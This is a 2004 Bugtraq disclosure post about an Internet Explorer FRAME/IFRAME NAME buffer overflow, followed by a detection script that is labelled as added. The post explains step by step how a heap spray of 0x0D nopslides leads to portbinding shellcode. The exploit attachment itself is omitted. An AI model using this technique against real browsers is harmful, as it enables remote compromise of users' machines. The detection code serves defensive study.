[37202] in bugtraq
MSIE
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue Nov 2 15:36:56 2004
Date: Tue, 2 Nov 2004 10:19:34 +0100 (CET)
From: Michal Zalewski <lcamtuf@coredump.cx>
To: bugtraq@securityfocus.com
Message-ID: <20041102101256.T7254@dekadens.coredump.cx>
A supposed PoC for a vulnerability discovered by ned of felinemenace.org
over a week ago, using his Python port of my mangleme utility (the utility
itself released some two weeks ago).
I'm taking this opportunity to do some whoring because the author
indicated that his original post bounced off BUGTRAQ due to "illegal"
Content-Type of text/html.
/mz
---------- Forwarded message ----------
Date: Tue, 2 Nov 2004 01:41:43 +0100
From: Berend-Jan Wever <skylined@edup.tudelft.nl>
Subject: MSIE <IFRAME> and <FRAME> tag NAME property buffer overflow PoC exploit (was: python does mangleme (with IE bugs!))
Since nobody else posted an exploit I figured I might as well slap the BoF together with my default exploit JavaScript for the script kiddies to rejoice and the sysadmins to worry about.
<TECHNICAL>
The JavaScript creates a large amount of heap-blocks filled with 0x0D byte nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs.
The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
We land inside one of the nopslides and slide on down to the shellcode. The shellcode is of the portbinding type, port 28876 to be exact. So now you know when to send me a happy birthday email...
The exploit will work with the <FRAME> and <IFRAME> tag; the attached file uses <IFRAME>.
</TECHNICAL>
<DUMMIES>
For all you guys that cannot set up their AV software right, you can download the attachment from one of the many mirrors of this list.
</DUMMIES>
Cheers,
SkyLined
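One way a content filter or IDS could flag the two artefacts the post describes, an overlong NAME attribute on <FRAME>/<IFRAME> and JavaScript string literals that decode to 0x0D nopsleds, as an added example that is not part of the original post (the thresholds and the sample page are constructed assumptions):

```python
"""Signature-style scan for the overflow trigger (overlong frame NAME) and
the 0x0D heap-spray literals described in the post. Added example;
thresholds are assumptions, not values from the original message."""
import re

MAX_NAME_LEN = 256         # assumed: legitimate frame names are short
MIN_SPRAY_FRACTION = 0.5   # assumed: share of a decoded literal that is 0x0D

TAG_RE = re.compile(r"<\s*(i?frame)\b([^>]*)>", re.IGNORECASE | re.DOTALL)
NAME_RE = re.compile(r"""\bname\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                     re.IGNORECASE)
# String literals handed to unescape(), e.g. unescape("%u0d0d%u0d0d...")
UNESCAPE_RE = re.compile(r"""unescape\s*\(\s*(["'])(.*?)\1\s*\)""",
                         re.IGNORECASE | re.DOTALL)
ESC_RE = re.compile(r"%u([0-9a-f]{4})|%([0-9a-f]{2})", re.IGNORECASE)

def decode_js_escapes(s):
    """Expand %XX and %uXXXX escapes to bytes (%u is little-endian, as IE lays it out)."""
    out, pos = bytearray(), 0
    for m in ESC_RE.finditer(s):
        out += s[pos:m.start()].encode("latin-1", "replace")
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += s[pos:].encode("latin-1", "replace")
    return bytes(out)

def scan_html(html):
    """Return (kind, detail) findings: overlong frame names and 0x0D-dominated literals."""
    findings = []
    for m in TAG_RE.finditer(html):
        n = NAME_RE.search(m.group(2))
        if n:
            name = next(v for v in n.groups() if v is not None)
            if len(name) > MAX_NAME_LEN:
                findings.append(("overlong_frame_name", (m.group(1).lower(), len(name))))
    for m in UNESCAPE_RE.finditer(html):
        data = decode_js_escapes(m.group(2))
        if data and data.count(0x0D) / len(data) >= MIN_SPRAY_FRACTION:
            findings.append(("0x0d_spray_literal", len(data)))
    return findings

# Constructed sample page: a benign frame, an overlong NAME, and a 0x0D sled literal.
SAMPLE = ('<iframe name="main" src="a.html"></iframe>'
          '<IFRAME NAME="' + "A" * 600 + '" SRC="b.html"></IFRAME>'
          '<script>var sled = unescape("' + "%u0d0d" * 64 + '");</script>')
```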
[Attachment: InternetExploiter.html.gz (APPLICATION/X-GUNZIP, base64-encoded; contents omitted)]